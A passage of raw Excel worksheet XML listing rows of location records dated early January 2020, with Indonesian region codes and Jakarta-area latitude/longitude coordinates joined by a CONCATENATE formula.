      <c r="W190" s="5">
        <v>-617469</v>
      </c>
      <c r="X190" t="s">
        <v>18368</v>
      </c>
      <c r="Y190" t="str">
        <f t="shared" si="2"/>
        <v>-6.17469,106.86539</v>
      </c>
    </row>
    <row r="191" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A191">
        <v>101814</v>
      </c>
      <c r="B191" s="1">
        <v>43832</v>
      </c>
      <c r="C191" s="2">
        <v>0.58773148148148147</v>
      </c>
      <c r="D191" t="s">
        <v>22</v>
      </c>
      <c r="E191" t="s">
        <v>23</v>
      </c>
      <c r="F191" t="s">
        <v>936</v>
      </c>
      <c r="G191" t="s">
        <v>937</v>
      </c>
      <c r="H191" t="s">
        <v>26</v>
      </c>
      <c r="I191" t="s">
        <v>882</v>
      </c>
      <c r="J191" t="s">
        <v>37</v>
      </c>
      <c r="L191" t="s">
        <v>938</v>
      </c>
      <c r="M191">
        <v>3216100006</v>
      </c>
      <c r="N191">
        <v>3216100</v>
      </c>
      <c r="O191">
        <v>3216</v>
      </c>
      <c r="P191">
        <v>32</v>
      </c>
      <c r="Q191" t="s">
        <v>939</v>
      </c>
      <c r="R191" t="s">
        <v>940</v>
      </c>
      <c r="S191" t="s">
        <v>41</v>
      </c>
      <c r="T191" t="s">
        <v>42</v>
      </c>
      <c r="U191" s="5">
        <v>10700473</v>
      </c>
      <c r="V191" s="5" t="s">
        <v>14633</v>
      </c>
      <c r="W191" s="5">
        <v>-610422</v>
      </c>
      <c r="X191" t="s">
        <v>18443</v>
      </c>
      <c r="Y191" t="str">
        <f t="shared" si="2"/>
        <v>-6.10422,107.00473</v>
      </c>
    </row>
    <row r="192" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A192">
        <v>101815</v>
      </c>
      <c r="B192" s="1">
        <v>43832</v>
      </c>
      <c r="C192" s="2">
        <v>0.59109953703703699</v>
      </c>
      <c r="D192" t="s">
        <v>22</v>
      </c>
      <c r="E192" t="s">
        <v>23</v>
      </c>
      <c r="F192" t="s">
        <v>941</v>
      </c>
      <c r="H192" t="s">
        <v>26</v>
      </c>
      <c r="I192" t="s">
        <v>736</v>
      </c>
      <c r="J192" t="s">
        <v>37</v>
      </c>
      <c r="L192" t="s">
        <v>942</v>
      </c>
      <c r="M192">
        <v>3174070001</v>
      </c>
      <c r="N192">
        <v>3174070</v>
      </c>
      <c r="O192">
        <v>3174</v>
      </c>
      <c r="P192">
        <v>31</v>
      </c>
      <c r="Q192" t="s">
        <v>83</v>
      </c>
      <c r="R192" t="s">
        <v>84</v>
      </c>
      <c r="S192" t="s">
        <v>32</v>
      </c>
      <c r="T192" t="s">
        <v>33</v>
      </c>
      <c r="U192" s="5">
        <v>10671435</v>
      </c>
      <c r="V192" s="5" t="s">
        <v>14634</v>
      </c>
      <c r="W192" s="5">
        <v>-618482</v>
      </c>
      <c r="X192" t="s">
        <v>18444</v>
      </c>
      <c r="Y192" t="str">
        <f t="shared" si="2"/>
        <v>-6.18482,106.71435</v>
      </c>
    </row>
    <row r="193" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A193">
        <v>101816</v>
      </c>
      <c r="B193" s="1">
        <v>43832</v>
      </c>
      <c r="C193" s="2">
        <v>0.59444444444444444</v>
      </c>
      <c r="D193" t="s">
        <v>22</v>
      </c>
      <c r="E193" t="s">
        <v>23</v>
      </c>
      <c r="F193" t="s">
        <v>943</v>
      </c>
      <c r="G193" t="s">
        <v>944</v>
      </c>
      <c r="H193" t="s">
        <v>26</v>
      </c>
      <c r="I193" t="s">
        <v>945</v>
      </c>
      <c r="J193" t="s">
        <v>675</v>
      </c>
      <c r="L193" t="s">
        <v>946</v>
      </c>
      <c r="M193">
        <v>3174010006</v>
      </c>
      <c r="N193">
        <v>3174010</v>
      </c>
      <c r="O193">
        <v>3174</v>
      </c>
      <c r="P193">
        <v>31</v>
      </c>
      <c r="Q193" t="s">
        <v>268</v>
      </c>
      <c r="R193" t="s">
        <v>69</v>
      </c>
      <c r="S193" t="s">
        <v>32</v>
      </c>
      <c r="T193" t="s">
        <v>33</v>
      </c>
      <c r="U193" s="5">
        <v>10673619</v>
      </c>
      <c r="V193" s="5" t="s">
        <v>14635</v>
      </c>
      <c r="W193" s="5">
        <v>-617726</v>
      </c>
      <c r="X193" t="s">
        <v>18445</v>
      </c>
      <c r="Y193" t="str">
        <f t="shared" si="2"/>
        <v>-6.17726,106.73619</v>
      </c>
    </row>
    <row r="194" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A194">
        <v>101817</v>
      </c>
      <c r="B194" s="1">
        <v>43832</v>
      </c>
      <c r="C194" s="2">
        <v>0.59597222222222224</v>
      </c>
      <c r="D194" t="s">
        <v>22</v>
      </c>
      <c r="E194" t="s">
        <v>23</v>
      </c>
      <c r="F194" t="s">
        <v>947</v>
      </c>
      <c r="G194" t="s">
        <v>948</v>
      </c>
      <c r="H194" t="s">
        <v>26</v>
      </c>
      <c r="I194" t="s">
        <v>715</v>
      </c>
      <c r="J194" t="s">
        <v>581</v>
      </c>
      <c r="L194" t="s">
        <v>949</v>
      </c>
      <c r="M194">
        <v>3174020007</v>
      </c>
      <c r="N194">
        <v>3174020</v>
      </c>
      <c r="O194">
        <v>3174</v>
      </c>
      <c r="P194">
        <v>31</v>
      </c>
      <c r="Q194" t="s">
        <v>95</v>
      </c>
      <c r="R194" t="s">
        <v>31</v>
      </c>
      <c r="S194" t="s">
        <v>32</v>
      </c>
      <c r="T194" t="s">
        <v>33</v>
      </c>
      <c r="U194" s="5">
        <v>10676031</v>
      </c>
      <c r="V194" s="5" t="s">
        <v>14636</v>
      </c>
      <c r="W194" s="5">
        <v>-616907</v>
      </c>
      <c r="X194" t="s">
        <v>18446</v>
      </c>
      <c r="Y194" t="str">
        <f t="shared" si="2"/>
        <v>-6.16907,106.76031</v>
      </c>
    </row>
    <row r="195" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A195">
        <v>101818</v>
      </c>
      <c r="B195" s="1">
        <v>43832</v>
      </c>
      <c r="C195" s="2">
        <v>0.60482638888888884</v>
      </c>
      <c r="D195" t="s">
        <v>22</v>
      </c>
      <c r="E195" t="s">
        <v>23</v>
      </c>
      <c r="F195" t="s">
        <v>950</v>
      </c>
      <c r="G195" t="s">
        <v>951</v>
      </c>
      <c r="H195" t="s">
        <v>26</v>
      </c>
      <c r="I195" t="s">
        <v>952</v>
      </c>
      <c r="J195" t="s">
        <v>37</v>
      </c>
      <c r="L195" t="s">
        <v>953</v>
      </c>
      <c r="M195">
        <v>3275050007</v>
      </c>
      <c r="N195">
        <v>3275050</v>
      </c>
      <c r="O195">
        <v>3275</v>
      </c>
      <c r="P195">
        <v>32</v>
      </c>
      <c r="Q195" t="s">
        <v>954</v>
      </c>
      <c r="R195" t="s">
        <v>955</v>
      </c>
      <c r="S195" t="s">
        <v>41</v>
      </c>
      <c r="T195" t="s">
        <v>42</v>
      </c>
      <c r="U195" s="5">
        <v>10697765</v>
      </c>
      <c r="V195" s="5" t="s">
        <v>14637</v>
      </c>
      <c r="W195" s="5">
        <v>-624327</v>
      </c>
      <c r="X195" t="s">
        <v>18447</v>
      </c>
      <c r="Y195" t="str">
        <f t="shared" ref="Y195:Y258" si="3">CONCATENATE(X195,",",V195)</f>
        <v>-6.24327,106.97765</v>
      </c>
    </row>
    <row r="196" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A196">
        <v>101819</v>
      </c>
      <c r="B196" s="1">
        <v>43832</v>
      </c>
      <c r="C196" s="2">
        <v>0.61253472222222227</v>
      </c>
      <c r="D196" t="s">
        <v>22</v>
      </c>
      <c r="E196" t="s">
        <v>23</v>
      </c>
      <c r="F196" t="s">
        <v>956</v>
      </c>
      <c r="G196" t="s">
        <v>957</v>
      </c>
      <c r="H196" t="s">
        <v>26</v>
      </c>
      <c r="I196" t="s">
        <v>166</v>
      </c>
      <c r="J196" t="s">
        <v>793</v>
      </c>
      <c r="L196" t="s">
        <v>958</v>
      </c>
      <c r="M196">
        <v>3175010002</v>
      </c>
      <c r="N196">
        <v>3175010</v>
      </c>
      <c r="O196">
        <v>3175</v>
      </c>
      <c r="P196">
        <v>31</v>
      </c>
      <c r="Q196" t="s">
        <v>616</v>
      </c>
      <c r="R196" t="s">
        <v>546</v>
      </c>
      <c r="S196" t="s">
        <v>547</v>
      </c>
      <c r="T196" t="s">
        <v>33</v>
      </c>
      <c r="U196" s="5">
        <v>10677224</v>
      </c>
      <c r="V196" s="5" t="s">
        <v>14638</v>
      </c>
      <c r="W196" s="5">
        <v>-614132</v>
      </c>
      <c r="X196" t="s">
        <v>18448</v>
      </c>
      <c r="Y196" t="str">
        <f t="shared" si="3"/>
        <v>-6.14132,106.77224</v>
      </c>
    </row>
    <row r="197" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A197">
        <v>101820</v>
      </c>
      <c r="B197" s="1">
        <v>43832</v>
      </c>
      <c r="C197" s="2">
        <v>0.67024305555555552</v>
      </c>
      <c r="D197" t="s">
        <v>22</v>
      </c>
      <c r="E197" t="s">
        <v>23</v>
      </c>
      <c r="F197" t="s">
        <v>959</v>
      </c>
      <c r="G197" t="s">
        <v>960</v>
      </c>
      <c r="H197" t="s">
        <v>26</v>
      </c>
      <c r="I197" t="s">
        <v>961</v>
      </c>
      <c r="J197" t="s">
        <v>723</v>
      </c>
      <c r="L197" t="s">
        <v>962</v>
      </c>
      <c r="M197">
        <v>3174070002</v>
      </c>
      <c r="N197">
        <v>3174070</v>
      </c>
      <c r="O197">
        <v>3174</v>
      </c>
      <c r="P197">
        <v>31</v>
      </c>
      <c r="Q197" t="s">
        <v>621</v>
      </c>
      <c r="R197" t="s">
        <v>84</v>
      </c>
      <c r="S197" t="s">
        <v>32</v>
      </c>
      <c r="T197" t="s">
        <v>33</v>
      </c>
      <c r="U197" s="5">
        <v>10674427</v>
      </c>
      <c r="V197" s="5" t="s">
        <v>14639</v>
      </c>
      <c r="W197" s="5">
        <v>-616453</v>
      </c>
      <c r="X197" t="s">
        <v>18449</v>
      </c>
      <c r="Y197" t="str">
        <f t="shared" si="3"/>
        <v>-6.16453,106.74427</v>
      </c>
    </row>
    <row r="198" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A198">
        <v>101821</v>
      </c>
      <c r="B198" s="1">
        <v>43832</v>
      </c>
      <c r="C198" s="2">
        <v>0.67343750000000002</v>
      </c>
      <c r="D198" t="s">
        <v>22</v>
      </c>
      <c r="E198" t="s">
        <v>23</v>
      </c>
      <c r="F198" t="s">
        <v>963</v>
      </c>
      <c r="G198" t="s">
        <v>964</v>
      </c>
      <c r="H198" t="s">
        <v>26</v>
      </c>
      <c r="I198" t="s">
        <v>965</v>
      </c>
      <c r="J198" t="s">
        <v>644</v>
      </c>
      <c r="L198" t="s">
        <v>966</v>
      </c>
      <c r="M198">
        <v>3174070002</v>
      </c>
      <c r="N198">
        <v>3174070</v>
      </c>
      <c r="O198">
        <v>3174</v>
      </c>
      <c r="P198">
        <v>31</v>
      </c>
      <c r="Q198" t="s">
        <v>621</v>
      </c>
      <c r="R198" t="s">
        <v>84</v>
      </c>
      <c r="S198" t="s">
        <v>32</v>
      </c>
      <c r="T198" t="s">
        <v>33</v>
      </c>
      <c r="U198" s="5">
        <v>10674588</v>
      </c>
      <c r="V198" s="5" t="s">
        <v>14640</v>
      </c>
      <c r="W198" s="5">
        <v>-616329</v>
      </c>
      <c r="X198" t="s">
        <v>18450</v>
      </c>
      <c r="Y198" t="str">
        <f t="shared" si="3"/>
        <v>-6.16329,106.74588</v>
      </c>
    </row>
    <row r="199" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A199">
        <v>101822</v>
      </c>
      <c r="B199" s="1">
        <v>43832</v>
      </c>
      <c r="C199" s="2">
        <v>0.67509259259259258</v>
      </c>
      <c r="D199" t="s">
        <v>22</v>
      </c>
      <c r="E199" t="s">
        <v>23</v>
      </c>
      <c r="F199" t="s">
        <v>967</v>
      </c>
      <c r="G199" t="s">
        <v>968</v>
      </c>
      <c r="H199" t="s">
        <v>26</v>
      </c>
      <c r="I199" t="s">
        <v>969</v>
      </c>
      <c r="J199" t="s">
        <v>970</v>
      </c>
      <c r="L199" t="s">
        <v>971</v>
      </c>
      <c r="M199">
        <v>3174020003</v>
      </c>
      <c r="N199">
        <v>3174020</v>
      </c>
      <c r="O199">
        <v>3174</v>
      </c>
      <c r="P199">
        <v>31</v>
      </c>
      <c r="Q199" t="s">
        <v>257</v>
      </c>
      <c r="R199" t="s">
        <v>31</v>
      </c>
      <c r="S199" t="s">
        <v>32</v>
      </c>
      <c r="T199" t="s">
        <v>33</v>
      </c>
      <c r="U199" s="5">
        <v>10676534</v>
      </c>
      <c r="V199" s="5" t="s">
        <v>14641</v>
      </c>
      <c r="W199" s="5">
        <v>-621376</v>
      </c>
      <c r="X199" t="s">
        <v>18451</v>
      </c>
      <c r="Y199" t="str">
        <f t="shared" si="3"/>
        <v>-6.21376,106.76534</v>
      </c>
    </row>
    <row r="200" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A200">
        <v>101823</v>
      </c>
      <c r="B200" s="1">
        <v>43832</v>
      </c>
      <c r="C200" s="2">
        <v>0.68734953703703694</v>
      </c>
      <c r="D200" t="s">
        <v>22</v>
      </c>
      <c r="E200" t="s">
        <v>23</v>
      </c>
      <c r="F200" t="s">
        <v>972</v>
      </c>
      <c r="G200" t="s">
        <v>973</v>
      </c>
      <c r="H200" t="s">
        <v>26</v>
      </c>
      <c r="I200" t="s">
        <v>974</v>
      </c>
      <c r="J200" t="s">
        <v>975</v>
      </c>
      <c r="L200" t="s">
        <v>976</v>
      </c>
      <c r="M200">
        <v>3174040007</v>
      </c>
      <c r="N200">
        <v>3174040</v>
      </c>
      <c r="O200">
        <v>3174</v>
      </c>
      <c r="P200">
        <v>31</v>
      </c>
      <c r="Q200" t="s">
        <v>389</v>
      </c>
      <c r="R200" t="s">
        <v>377</v>
      </c>
      <c r="S200" t="s">
        <v>32</v>
      </c>
      <c r="T200" t="s">
        <v>33</v>
      </c>
      <c r="U200" s="5">
        <v>10679213</v>
      </c>
      <c r="V200" s="5" t="s">
        <v>14642</v>
      </c>
      <c r="W200" s="5">
        <v>-615130</v>
      </c>
      <c r="X200" t="s">
        <v>18452</v>
      </c>
      <c r="Y200" t="str">
        <f t="shared" si="3"/>
        <v>-6.15130,106.79213</v>
      </c>
    </row>
    <row r="201" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A201">
        <v>101824</v>
      </c>
      <c r="B201" s="1">
        <v>43832</v>
      </c>
      <c r="C201" s="2">
        <v>0.71201388888888895</v>
      </c>
      <c r="D201" t="s">
        <v>22</v>
      </c>
      <c r="E201" t="s">
        <v>23</v>
      </c>
      <c r="F201" t="s">
        <v>977</v>
      </c>
      <c r="G201" t="s">
        <v>978</v>
      </c>
      <c r="H201" t="s">
        <v>26</v>
      </c>
      <c r="I201" t="s">
        <v>979</v>
      </c>
      <c r="J201" t="s">
        <v>980</v>
      </c>
      <c r="M201">
        <v>3174040007</v>
      </c>
      <c r="N201">
        <v>3174040</v>
      </c>
      <c r="O201">
        <v>3174</v>
      </c>
      <c r="P201">
        <v>31</v>
      </c>
      <c r="Q201" t="s">
        <v>389</v>
      </c>
      <c r="R201" t="s">
        <v>377</v>
      </c>
      <c r="S201" t="s">
        <v>32</v>
      </c>
      <c r="T201" t="s">
        <v>33</v>
      </c>
      <c r="U201" s="5">
        <v>10678271</v>
      </c>
      <c r="V201" s="5" t="s">
        <v>14643</v>
      </c>
      <c r="W201" s="5">
        <v>-615125</v>
      </c>
      <c r="X201" t="s">
        <v>18453</v>
      </c>
      <c r="Y201" t="str">
        <f t="shared" si="3"/>
        <v>-6.15125,106.78271</v>
      </c>
    </row>
    <row r="202" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A202">
        <v>101825</v>
      </c>
      <c r="B202" s="1">
        <v>43832</v>
      </c>
      <c r="C202" s="2">
        <v>0.77098379629629632</v>
      </c>
      <c r="D202" t="s">
        <v>22</v>
      </c>
      <c r="E202" t="s">
        <v>23</v>
      </c>
      <c r="F202" t="s">
        <v>981</v>
      </c>
      <c r="G202" t="s">
        <v>982</v>
      </c>
      <c r="H202" t="s">
        <v>26</v>
      </c>
      <c r="I202" t="s">
        <v>983</v>
      </c>
      <c r="J202" t="s">
        <v>37</v>
      </c>
      <c r="L202" t="s">
        <v>984</v>
      </c>
      <c r="M202">
        <v>3216082005</v>
      </c>
      <c r="N202">
        <v>3216082</v>
      </c>
      <c r="O202">
        <v>3216</v>
      </c>
      <c r="P202">
        <v>32</v>
      </c>
      <c r="Q202" t="s">
        <v>985</v>
      </c>
      <c r="R202" t="s">
        <v>601</v>
      </c>
      <c r="S202" t="s">
        <v>41</v>
      </c>
      <c r="T202" t="s">
        <v>42</v>
      </c>
      <c r="U202" s="5">
        <v>10705216</v>
      </c>
      <c r="V202" s="5" t="s">
        <v>14644</v>
      </c>
      <c r="W202" s="5">
        <v>-616040</v>
      </c>
      <c r="X202" t="s">
        <v>18454</v>
      </c>
      <c r="Y202" t="str">
        <f t="shared" si="3"/>
        <v>-6.16040,107.05216</v>
      </c>
    </row>
    <row r="203" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A203">
        <v>99239</v>
      </c>
      <c r="B203" s="1">
        <v>43832</v>
      </c>
      <c r="C203" s="2">
        <v>6.7129629629629625E-4</v>
      </c>
      <c r="D203" t="s">
        <v>22</v>
      </c>
      <c r="E203" t="s">
        <v>23</v>
      </c>
      <c r="F203" t="s">
        <v>986</v>
      </c>
      <c r="H203" t="s">
        <v>26</v>
      </c>
      <c r="I203" t="s">
        <v>367</v>
      </c>
      <c r="J203" t="s">
        <v>37</v>
      </c>
      <c r="L203" t="s">
        <v>987</v>
      </c>
      <c r="M203">
        <v>3275031003</v>
      </c>
      <c r="N203">
        <v>3275031</v>
      </c>
      <c r="O203">
        <v>3275</v>
      </c>
      <c r="P203">
        <v>32</v>
      </c>
      <c r="Q203" t="s">
        <v>988</v>
      </c>
      <c r="R203" t="s">
        <v>574</v>
      </c>
      <c r="S203" t="s">
        <v>41</v>
      </c>
      <c r="T203" t="s">
        <v>42</v>
      </c>
      <c r="U203" s="5">
        <v>10701728</v>
      </c>
      <c r="V203" s="5" t="s">
        <v>14645</v>
      </c>
      <c r="W203" s="5">
        <v>-629039</v>
      </c>
      <c r="X203" t="s">
        <v>18455</v>
      </c>
      <c r="Y203" t="str">
        <f t="shared" si="3"/>
        <v>-6.29039,107.01728</v>
      </c>
    </row>
    <row r="204" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A204">
        <v>99240</v>
      </c>
      <c r="B204" s="1">
        <v>43832</v>
      </c>
      <c r="C204" s="2">
        <v>1.8541666666666668E-2</v>
      </c>
      <c r="D204" t="s">
        <v>85</v>
      </c>
      <c r="E204" t="s">
        <v>23</v>
      </c>
      <c r="F204" t="s">
        <v>989</v>
      </c>
      <c r="G204" t="s">
        <v>990</v>
      </c>
      <c r="H204" t="s">
        <v>26</v>
      </c>
      <c r="I204" t="s">
        <v>710</v>
      </c>
      <c r="J204" t="s">
        <v>37</v>
      </c>
      <c r="K204" t="s">
        <v>991</v>
      </c>
      <c r="L204" t="s">
        <v>992</v>
      </c>
      <c r="M204">
        <v>3271020004</v>
      </c>
      <c r="N204">
        <v>3271020</v>
      </c>
      <c r="O204">
        <v>3271</v>
      </c>
      <c r="P204">
        <v>32</v>
      </c>
      <c r="Q204" t="s">
        <v>993</v>
      </c>
      <c r="R204" t="s">
        <v>994</v>
      </c>
      <c r="S204" t="s">
        <v>421</v>
      </c>
      <c r="T204" t="s">
        <v>42</v>
      </c>
      <c r="U204" s="5">
        <v>10683674</v>
      </c>
      <c r="V204" s="5" t="s">
        <v>14646</v>
      </c>
      <c r="W204" s="5">
        <v>-663305</v>
      </c>
      <c r="X204" t="s">
        <v>18456</v>
      </c>
      <c r="Y204" t="str">
        <f t="shared" si="3"/>
        <v>-6.63305,106.83674</v>
      </c>
    </row>
    <row r="205" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A205">
        <v>99253</v>
      </c>
      <c r="B205" s="1">
        <v>43832</v>
      </c>
      <c r="C205" s="2">
        <v>2.7754629629629629E-2</v>
      </c>
      <c r="D205" t="s">
        <v>22</v>
      </c>
      <c r="E205" t="s">
        <v>23</v>
      </c>
      <c r="F205" t="s">
        <v>995</v>
      </c>
      <c r="G205" t="s">
        <v>996</v>
      </c>
      <c r="H205" t="s">
        <v>26</v>
      </c>
      <c r="I205" t="s">
        <v>997</v>
      </c>
      <c r="J205" t="s">
        <v>37</v>
      </c>
      <c r="L205" t="s">
        <v>998</v>
      </c>
      <c r="M205">
        <v>3275060003</v>
      </c>
      <c r="N205">
        <v>3275060</v>
      </c>
      <c r="O205">
        <v>3275</v>
      </c>
      <c r="P205">
        <v>32</v>
      </c>
      <c r="Q205" t="s">
        <v>146</v>
      </c>
      <c r="R205" t="s">
        <v>114</v>
      </c>
      <c r="S205" t="s">
        <v>41</v>
      </c>
      <c r="T205" t="s">
        <v>42</v>
      </c>
      <c r="U205" s="5">
        <v>10698220</v>
      </c>
      <c r="V205" s="5" t="s">
        <v>14647</v>
      </c>
      <c r="W205" s="5">
        <v>-622878</v>
      </c>
      <c r="X205" t="s">
        <v>18457</v>
      </c>
      <c r="Y205" t="str">
        <f t="shared" si="3"/>
        <v>-6.22878,106.98220</v>
      </c>
    </row>
    <row r="206" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A206">
        <v>99261</v>
      </c>
      <c r="B206" s="1">
        <v>43832</v>
      </c>
      <c r="C206" s="2">
        <v>2.9722222222222219E-2</v>
      </c>
      <c r="D206" t="s">
        <v>22</v>
      </c>
      <c r="E206" t="s">
        <v>23</v>
      </c>
      <c r="F206" t="s">
        <v>999</v>
      </c>
      <c r="H206" t="s">
        <v>26</v>
      </c>
      <c r="I206" t="s">
        <v>1000</v>
      </c>
      <c r="J206" t="s">
        <v>1001</v>
      </c>
      <c r="L206" t="s">
        <v>1002</v>
      </c>
      <c r="M206">
        <v>3173060008</v>
      </c>
      <c r="N206">
        <v>3173060</v>
      </c>
      <c r="O206">
        <v>3173</v>
      </c>
      <c r="P206">
        <v>31</v>
      </c>
      <c r="Q206" t="s">
        <v>329</v>
      </c>
      <c r="R206" t="s">
        <v>61</v>
      </c>
      <c r="S206" t="s">
        <v>62</v>
      </c>
      <c r="T206" t="s">
        <v>33</v>
      </c>
      <c r="U206" s="5">
        <v>10684043</v>
      </c>
      <c r="V206" s="5" t="s">
        <v>14648</v>
      </c>
      <c r="W206" s="5">
        <v>-616357</v>
      </c>
      <c r="X206" t="s">
        <v>18458</v>
      </c>
      <c r="Y206" t="str">
        <f t="shared" si="3"/>
        <v>-6.16357,106.84043</v>
      </c>
    </row>
    <row r="207" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A207">
        <v>99267</v>
      </c>
      <c r="B207" s="1">
        <v>43832</v>
      </c>
      <c r="C207" s="2">
        <v>3.1782407407407405E-2</v>
      </c>
      <c r="D207" t="s">
        <v>22</v>
      </c>
      <c r="E207" t="s">
        <v>23</v>
      </c>
      <c r="F207" t="s">
        <v>1003</v>
      </c>
      <c r="G207" t="s">
        <v>1004</v>
      </c>
      <c r="H207" t="s">
        <v>26</v>
      </c>
      <c r="I207" t="s">
        <v>1005</v>
      </c>
      <c r="J207" t="s">
        <v>614</v>
      </c>
      <c r="L207" t="s">
        <v>1006</v>
      </c>
      <c r="M207">
        <v>3175010002</v>
      </c>
      <c r="N207">
        <v>3175010</v>
      </c>
      <c r="O207">
        <v>3175</v>
      </c>
      <c r="P207">
        <v>31</v>
      </c>
      <c r="Q207" t="s">
        <v>616</v>
      </c>
      <c r="R207" t="s">
        <v>546</v>
      </c>
      <c r="S207" t="s">
        <v>547</v>
      </c>
      <c r="T207" t="s">
        <v>33</v>
      </c>
      <c r="U207" s="5">
        <v>10677271</v>
      </c>
      <c r="V207" s="5" t="s">
        <v>14649</v>
      </c>
      <c r="W207" s="5">
        <v>-613316</v>
      </c>
      <c r="X207" t="s">
        <v>18459</v>
      </c>
      <c r="Y207" t="str">
        <f t="shared" si="3"/>
        <v>-6.13316,106.77271</v>
      </c>
    </row>
    <row r="208" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A208">
        <v>99331</v>
      </c>
      <c r="B208" s="1">
        <v>43832</v>
      </c>
      <c r="C208" s="2">
        <v>5.541666666666667E-2</v>
      </c>
      <c r="D208" t="s">
        <v>22</v>
      </c>
      <c r="E208" t="s">
        <v>23</v>
      </c>
      <c r="F208" t="s">
        <v>1007</v>
      </c>
      <c r="G208" t="s">
        <v>1008</v>
      </c>
      <c r="H208" t="s">
        <v>26</v>
      </c>
      <c r="I208" t="s">
        <v>1009</v>
      </c>
      <c r="J208" t="s">
        <v>1010</v>
      </c>
      <c r="L208" t="s">
        <v>1011</v>
      </c>
      <c r="M208">
        <v>3175050002</v>
      </c>
      <c r="N208">
        <v>3175050</v>
      </c>
      <c r="O208">
        <v>3175</v>
      </c>
      <c r="P208">
        <v>31</v>
      </c>
      <c r="Q208" t="s">
        <v>1012</v>
      </c>
      <c r="R208" t="s">
        <v>1013</v>
      </c>
      <c r="S208" t="s">
        <v>547</v>
      </c>
      <c r="T208" t="s">
        <v>33</v>
      </c>
      <c r="U208" s="5">
        <v>10690478</v>
      </c>
      <c r="V208" s="5" t="s">
        <v>14650</v>
      </c>
      <c r="W208" s="5">
        <v>-616879</v>
      </c>
      <c r="X208" t="s">
        <v>18460</v>
      </c>
      <c r="Y208" t="str">
        <f t="shared" si="3"/>
        <v>-6.16879,106.90478</v>
      </c>
    </row>
    <row r="209" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A209">
        <v>99350</v>
      </c>
      <c r="B209" s="1">
        <v>43832</v>
      </c>
      <c r="C209" s="2">
        <v>5.1030092592592592E-2</v>
      </c>
      <c r="D209" t="s">
        <v>85</v>
      </c>
      <c r="E209" t="s">
        <v>23</v>
      </c>
      <c r="F209" t="s">
        <v>1014</v>
      </c>
      <c r="G209" t="s">
        <v>1015</v>
      </c>
      <c r="H209" t="s">
        <v>26</v>
      </c>
      <c r="J209" t="s">
        <v>1016</v>
      </c>
      <c r="K209" t="s">
        <v>1017</v>
      </c>
      <c r="L209" t="s">
        <v>1018</v>
      </c>
      <c r="M209">
        <v>3172060005</v>
      </c>
      <c r="N209">
        <v>3172060</v>
      </c>
      <c r="O209">
        <v>3172</v>
      </c>
      <c r="P209">
        <v>31</v>
      </c>
      <c r="Q209" t="s">
        <v>1019</v>
      </c>
      <c r="R209" t="s">
        <v>48</v>
      </c>
      <c r="S209" t="s">
        <v>49</v>
      </c>
      <c r="T209" t="s">
        <v>33</v>
      </c>
      <c r="U209" s="5">
        <v>10687946</v>
      </c>
      <c r="V209" s="5" t="s">
        <v>14651</v>
      </c>
      <c r="W209" s="5">
        <v>-621483</v>
      </c>
      <c r="X209" t="s">
        <v>18461</v>
      </c>
      <c r="Y209" t="str">
        <f t="shared" si="3"/>
        <v>-6.21483,106.87946</v>
      </c>
    </row>
    <row r="210" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A210">
        <v>99366</v>
      </c>
      <c r="B210" s="1">
        <v>43832</v>
      </c>
      <c r="C210" s="2">
        <v>6.3935185185185192E-2</v>
      </c>
      <c r="D210" t="s">
        <v>85</v>
      </c>
      <c r="E210" t="s">
        <v>23</v>
      </c>
      <c r="F210" t="s">
        <v>1020</v>
      </c>
      <c r="G210" t="s">
        <v>1021</v>
      </c>
      <c r="H210" t="s">
        <v>26</v>
      </c>
      <c r="I210" t="s">
        <v>103</v>
      </c>
      <c r="J210" t="s">
        <v>1022</v>
      </c>
      <c r="K210" t="s">
        <v>1023</v>
      </c>
      <c r="L210" t="s">
        <v>1024</v>
      </c>
      <c r="M210">
        <v>3172060002</v>
      </c>
      <c r="N210">
        <v>3172060</v>
      </c>
      <c r="O210">
        <v>3172</v>
      </c>
      <c r="P210">
        <v>31</v>
      </c>
      <c r="Q210" t="s">
        <v>1025</v>
      </c>
      <c r="R210" t="s">
        <v>48</v>
      </c>
      <c r="S210" t="s">
        <v>49</v>
      </c>
      <c r="T210" t="s">
        <v>33</v>
      </c>
      <c r="U210" s="5">
        <v>10687441</v>
      </c>
      <c r="V210" s="5" t="s">
        <v>14652</v>
      </c>
      <c r="W210" s="5">
        <v>-624595</v>
      </c>
      <c r="X210" t="s">
        <v>18462</v>
      </c>
      <c r="Y210" t="str">
        <f t="shared" si="3"/>
        <v>-6.24595,106.87441</v>
      </c>
    </row>
    <row r="211" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A211">
        <v>99403</v>
      </c>
      <c r="B211" s="1">
        <v>43832</v>
      </c>
      <c r="C211" s="2">
        <v>7.5972222222222219E-2</v>
      </c>
      <c r="D211" t="s">
        <v>22</v>
      </c>
      <c r="E211" t="s">
        <v>23</v>
      </c>
      <c r="F211" t="s">
        <v>1026</v>
      </c>
      <c r="G211" t="s">
        <v>1027</v>
      </c>
      <c r="H211" t="s">
        <v>26</v>
      </c>
      <c r="I211" t="s">
        <v>1028</v>
      </c>
      <c r="J211" t="s">
        <v>543</v>
      </c>
      <c r="L211" t="s">
        <v>1029</v>
      </c>
      <c r="M211">
        <v>3175010003</v>
      </c>
      <c r="N211">
        <v>3175010</v>
      </c>
      <c r="O211">
        <v>3175</v>
      </c>
      <c r="P211">
        <v>31</v>
      </c>
      <c r="Q211" t="s">
        <v>545</v>
      </c>
      <c r="R211" t="s">
        <v>546</v>
      </c>
      <c r="S211" t="s">
        <v>547</v>
      </c>
      <c r="T211" t="s">
        <v>33</v>
      </c>
      <c r="U211" s="5">
        <v>10677983</v>
      </c>
